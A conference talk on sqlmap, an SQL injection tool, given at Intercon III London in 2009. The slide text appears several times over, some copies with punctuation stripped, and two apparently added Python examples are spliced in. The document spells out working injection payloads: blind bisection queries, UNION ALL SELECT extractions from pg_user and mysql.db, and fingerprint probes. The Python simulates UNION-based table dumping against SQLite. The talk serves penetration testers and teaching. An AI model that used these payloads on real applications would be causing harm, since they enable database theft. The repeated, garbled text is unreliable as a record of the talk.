- Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
- Metasploit Framework, H D Moore and the Metasploit development team
- w3af, Andres Riancho and the w3af development team
- Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
- Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
- Python difflib, Python Software Foundation
- NULL (SQL), Wikipedia
- Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
- Insight on UNION query SQL injection, Bernardo Damele A. G.
- DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)
Questions?
Thanks for your attention
Outline
- First
- About me
- SQL what (1/2)
- SQL what (2/2)
- State of art
- How does it work
- sqlmap
- sqlmap features (1/2)
- sqlmap features (2/2)
- Real world
- Dealing with advertisements (1/3)
- Dealing with advertisements (2/3)
- Dealing with advertisements (3/3)
- To NULL or not to NULL (1/4)
- To NULL or not to NULL (2/4)
- To NULL or not to NULL (3/4)
- To NULL or not to NULL (4/4)
- SQL payload (1/3)
- SQL payload (2/3)
- SQL payload (3/3)
- First demo
- Bypass columns limitation (1/4)
- Bypass columns limitation (2/4)
- Bypass columns limitation (3/4)
- Bypass columns limitation (4/4)
- Going partial UNION (1/3)
- Going partial UNION (2/3)
- Going partial UNION (3/3)
- DBMS fingerprint (1/4)
- DBMS fingerprint (2/4)
- DBMS fingerprint (3/4)
- DBMS fingerprint (4/4)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (1/2)
- Automation vs granularity (2/2)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Bypass columns limitation (1/4)
You have got an injection point.
It is vulnerable to UNION query SQL injection.
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing, depending on your options.

Bypass columns limitation (2/4)
Obstacle:
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement.

Bypass columns limitation (3/4)
A possible solution consists in concatenating your SELECT statement columns into a single output by using the specific DBMS string concatenation operator or function.
Example on PostgreSQL 8.3 to retrieve users' privileges.
The SQL query to inject is:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

Bypass columns limitation (4/4)
The injection will be:
UNION ALL SELECT NULL, CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)), CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102), NULL FROM pg_user--
Going partial UNION (1/3)
Obstacle:
You have got an injection point vulnerable to UNION query SQL injection. Only the query output's first entry, or a range of entries, is displayed in the page content.

Going partial UNION (2/3)
sqlmap automates a known technique:
- Changes the parameter value to its negative value, causing the original query to produce no output
- Inspects and unpacks the provided SQL statement
- Calculates its output's number of entries
- Limits it after the UNION ALL SELECT to return one entry at a time
- Repeats the previous action N times, where N is equal to the number of entries

Going partial UNION (3/3)
Example on MySQL 4.1 to enumerate the list of databases.
The SQL query to inject is:
SELECT db FROM mysql.db
sqlmap identified the injection point as being a non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario).
The injection will be:
id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
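Both the column-concatenation trick (Bypass columns limitation) and the partial UNION loop (Going partial UNION), as one added example that is not from the talk or from sqlmap. An in-memory SQLite database stands in for the DBMS: users is the application's 3-column query and privs a constructed 4-column table in the role of pg_user; SQLite's char() and || play CHR() and ||, and the delimiter strings are the ones on the slide. The function names (make_db, page, as_char, concat_columns, naive_union, fetch_entry, dump_table) are assumptions.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-ins: users backs the application's 3-column query,
    # privs plays the role of pg_user (one NULL to exercise COALESCE).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'alice', 'staff')")
    db.execute("CREATE TABLE privs (username TEXT, createdb INTEGER, "
               "superuser INTEGER, catupd INTEGER)")
    db.executemany("INSERT INTO privs VALUES (?, ?, ?, ?)",
                   [("postgres", 1, 1, 1), ("app", 0, 0, 0), ("report", None, 0, 0)])
    return db


def page(db, value):
    """Simulated page: a non-quoted integer parameter spliced into a 3-column
    SELECT, and only the first row's second column reaches the HTML."""
    row = db.execute(f"SELECT id, name, role FROM users WHERE id={value}").fetchone()
    return "" if row is None else str(row[1])


# Random delimiters as on the slide, written with char() so the payload
# carries no quote characters.
PRE, SEP, POST = "SrlGVt", "hdzQyZ", "KyPADf"


def as_char(s):
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def concat_columns(columns):
    """Folds N columns into one string: PRE || col1 || SEP || col2 ... || POST,
    each column cast to text with NULL replaced by a space (the slide's COALESCE)."""
    cells = [f"COALESCE(CAST({c} AS CHAR(10000)), char(32))" for c in columns]
    joined = ("||" + as_char(SEP) + "||").join(cells)
    return f"{as_char(PRE)}||{joined}||{as_char(POST)}"


def naive_union(db):
    """Four columns against a 3-column SELECT: the DBMS rejects the statement."""
    try:
        page(db, "-1 UNION ALL SELECT username, createdb, superuser, catupd FROM privs")
        return "accepted"
    except sqlite3.OperationalError:
        return "rejected"


def fetch_entry(db, columns, table, offset=None):
    """One partial-UNION request: the negative id silences the original query,
    LIMIT offset,1 selects one entry, and the delimiters locate it in the page."""
    limit = "" if offset is None else f" LIMIT {offset}, 1"
    value = f"-1 UNION ALL SELECT NULL, {concat_columns(columns)}, NULL FROM {table}{limit}"
    html = page(db, value)
    m = re.search(re.escape(PRE) + r"(.*?)" + re.escape(POST), html, re.S)
    return None if m is None else m.group(1).split(SEP)


def dump_table(db, table, columns):
    """Counts the entries first, then repeats the single-entry request N times."""
    count = int(fetch_entry(db, ["COUNT(*)"], table)[0])
    return [fetch_entry(db, columns, table, offset=i) for i in range(count)]
```

The naive UNION fails on the column-count check, while the concatenated form fits the application's single displayed column and survives NULL cells. The partial loop costs one request for the count plus one per entry, which is the repeated "-1 UNION ALL SELECT ... LIMIT n, 1" pattern a request log of a dumped table will show.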
DBMS fingerprint (1/4)
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw.
There are a few well known techniques and a few over-looked techniques.
sqlmap implements up to four techniques; three of these are in use by other tools.
- The user can force the back-end DBMS software value: no HTTP requests are sent to identify the software
- By default a basic DBMS fingerprint based on one or two techniques is done: only two HTTP requests are sent
- The user can choose to perform an extensive DBMS fingerprint based on four techniques: numerous (30+) HTTP requests are sent

DBMS fingerprint (2/4)
The techniques implemented to perform an extensive back-end DBMS fingerprint are:
- Inband error messages
- Banner parsing
- SQL dialect
- Specific functions static output comparison
On a default installation all of them are reliable.
On a hardened installation the last two are reliable.

DBMS fingerprint (3/4)
Example of basic back-end DBMS fingerprint on PostgreSQL 8.3.
The techniques in use are two.
The two SQL queries injected to identify it are:
AND <integer>::int=<integer> (SQL dialect)
AND COALESCE(<integer>, NULL)=<integer> (Specific function static output comparison)

DBMS fingerprint (4/4)
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005.
The techniques in use are three.
The result is:
active fingerprint: Microsoft SQL Server 2005
banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 version 9.00.1399
html error message fingerprint: Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison.
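The SQL dialect and specific-function probes and the banner parsing step from the fingerprint slides, as an added example that is neither the talk's nor sqlmap's actual probe list. It runs the probes through a boolean oracle over an in-memory SQLite database, so SQLite is the DBMS it should identify; the PostgreSQL pair is the one on the slide, the MySQL, Microsoft SQL Server and SQLite pairs are my own choices of dialect features, the banner string is constructed in the shape of a @@version value, and make_oracle, PROBES, fingerprint, BANNER_RE and parse_mssql_banner are assumed names.

```python
import re
import sqlite3


def make_oracle():
    """Boolean oracle over an in-memory SQLite database standing in for the
    True/False page. A statement the DBMS cannot parse counts as False, which
    is what a changed page means to the tester. Counts requests."""
    db = sqlite3.connect(":memory:")
    calls = {"n": 0}

    def oracle(condition):
        calls["n"] += 1
        try:
            return db.execute(f"SELECT 1 WHERE ({condition})").fetchone() is not None
        except sqlite3.OperationalError:
            return False

    oracle.calls = calls
    return oracle


# Per-DBMS probe pairs: (SQL dialect test, specific function static output test).
# The PostgreSQL pair is the one on the slide; the others are my own picks of
# well-known dialect features, not sqlmap's probe list.
PROBES = {
    "PostgreSQL": ("5::int=5", "COALESCE(5, NULL)=5"),
    "MySQL": ("MID('a',1,1)='a'", "IFNULL(5, NULL)=5"),
    "Microsoft SQL Server": ("LEN('a')=1", "ISNULL(5, NULL)=5"),
    "SQLite": ("sqlite_version() IS NOT NULL", "IFNULL(5, NULL)=5"),
}


def fingerprint(oracle, candidates=PROBES):
    """Returns the first DBMS whose dialect probe and function probe both hold.
    The dialect probe runs first: function names such as IFNULL are shared by
    several products, so on its own the function test does not discriminate."""
    for dbms, (dialect, function) in candidates.items():
        if oracle(dialect) and oracle(function):
            return dbms
    return None


# Banner parsing: product year and build out of a @@version-style string.
BANNER_RE = re.compile(r"Microsoft SQL Server (\d{4})\D+(\d+\.\d+\.\d+)")


def parse_mssql_banner(banner):
    m = BANNER_RE.search(banner)
    if m is None:
        return None
    return {"product": f"Microsoft SQL Server {m.group(1)}", "version": m.group(2)}


def demo():
    oracle = make_oracle()
    # Constructed banner in the shape of the slide's result (build 9.00.1399).
    banner = "Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)"
    return {
        "dbms": fingerprint(oracle),          # "SQLite"
        "requests": oracle.calls["n"],        # 5: three failed dialect probes, then two hits
        "banner": parse_mssql_banner(banner),
    }
```

The basic fingerprint on the slide costs two requests because the dialect and function probes for the right DBMS are tried first; the ordered loop here shows why a wrong first guess adds a request per candidate, and why the extensive mode that also parses banners and error messages needs many more. On a hardened installation, where banners and error messages are suppressed, only the two active probes remain, which is the slide's point about reliability.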
More on fingerprint
Fingerprinting is a key step in penetration testing.
It is not only about back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the back-end DBMS underlying system?
sqlmap can fingerprint them without making extra requests:
- Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.) – known technique
- Back-end DBMS operating system, by parsing the DBMS banner – over-looked technique
Second demo
"A demo, as in demolish or demonstration?"
Cyclops, X-Men Evolution
Give me a SQL shell
It might come in handy sometimes to be able to run your own SQL queries, mainly for file system read and write access and operating system command execution.
The tool inspects the provided statement:
- If it is a SELECT statement, sqlmap uses, depending on the user's options, the inferential blind or the UNION query technique to retrieve its output
- If it is a data manipulation statement, a transaction statement or any other valid SQL statement, it uses stacked queries to run it, if the web application supports them
Automation vs granularity (1/2)
sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications.
Providing it with a source of targets, it can automatically:
- Detect all possible SQL injections and confirm them
- Identify the SQL query syntax
- Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries and then manually inject them to enumerate users' password hashes, check if the session user is a DBA, enumerate table columns' datatype, etc.
There is an option to dump the whole back-end DBMS.

Automation vs granularity (2/2)
The tester is a professional: he knows what he does and why.
There are options to specify:
- How to compare True and False HTTP responses
- A single or more testable parameters
- The SQL payload prefix and postfix
- A single or a range of entries to dump from a table
- A single or multiple columns to dump from a table
- Custom SQL statements to run
Options can be specified from both the command line and/or a configuration file.
Options are documented in the user's manual with examples.
Third demo
"I get tons of uninteresting mail and system announcements about babies born, etc. At least a demo MIGHT have been interesting."
Richard Stallman
Limitations
Can sqlmap fail to detect or to exploit a SQL injection vulnerability?
Yes, in some cases, mainly because it does not support:
- SQL injection on SQL clauses other than WHERE
- Time based blind SQL injection technique
...but I am working on these and others.
Want to contribute?
I am always looking forward to code contributions.
Try it, find bugs, send feature requests, review the code and the documentation, contribute on the mailing lists.
I can provide you with:
- Details on code internals
- Write access to the Subversion repository
- Access to the development platform
- A beer if you are in the London area
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
- http://sqlmap.sourceforge.net/dev/index.html
- http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
- https://lists.sourceforge.net/lists/listinfo/sqlmap-users
- https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
- E-mail / Jabber: bernardo.damele@gmail.com
- Blog: http://bernardodamele.blogspot.com
References
- OWASP Testing Guide, Open Web Application Security Project
- Exploit of a Mom, xkcd
- Deep Blind SQL Injection, Ferruh Mavituna (Portcullis Computer Security Ltd)
- Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability, Bernhard Mueller (SEC Consult Vulnerability Lab)
- Metasploit Framework, H. D. Moore and the Metasploit development team
- w3af, Andres Riancho and the w3af development team
- Data-mining with SQL Injection and Inference, David Litchfield (NGS Software)
- Advanced SQL Injection, Victor Chapela (Sm4rt Security Services)
- Python difflib, Python Software Foundation
- NULL (SQL), Wikipedia
- Agent oriented SQL abuse, Fernando Russ and Diego Tiscornia (CORE Security)
- Insight on UNION query SQL injection, Bernardo Damele A. G.
- DBMS Fingerprint, Daniele Bellucci (OWASP Backend Security Project)
Questions?
Thanks for your attention!
Slide index:
- First
- About me
- SQL what (1/2)
- SQL what (2/2)
- State of art
- How does it work
- sqlmap
- sqlmap features (1/2)
- sqlmap features (2/2)
- Real world
- Dealing with advertisements (1/3)
- Dealing with advertisements (2/3)
- Dealing with advertisements (3/3)
- To NULL or not to NULL (1/4)
- To NULL or not to NULL (2/4)
- To NULL or not to NULL (3/4)
- To NULL or not to NULL (4/4)
- SQL payload (1/3)
- SQL payload (2/3)
- SQL payload (3/3)
- First demo
- Bypass columns limitation (1/4)
- Bypass columns limitation (2/4)
- Bypass columns limitation (3/4)
- Bypass columns limitation (4/4)
- Going partial UNION (1/3)
- Going partial UNION (2/3)
- Going partial UNION (3/3)
- DBMS fingerprint (1/4)
- DBMS fingerprint (2/4)
- DBMS fingerprint (3/4)
- DBMS fingerprint (4/4)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (1/2)
- Automation vs granularity (2/2)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
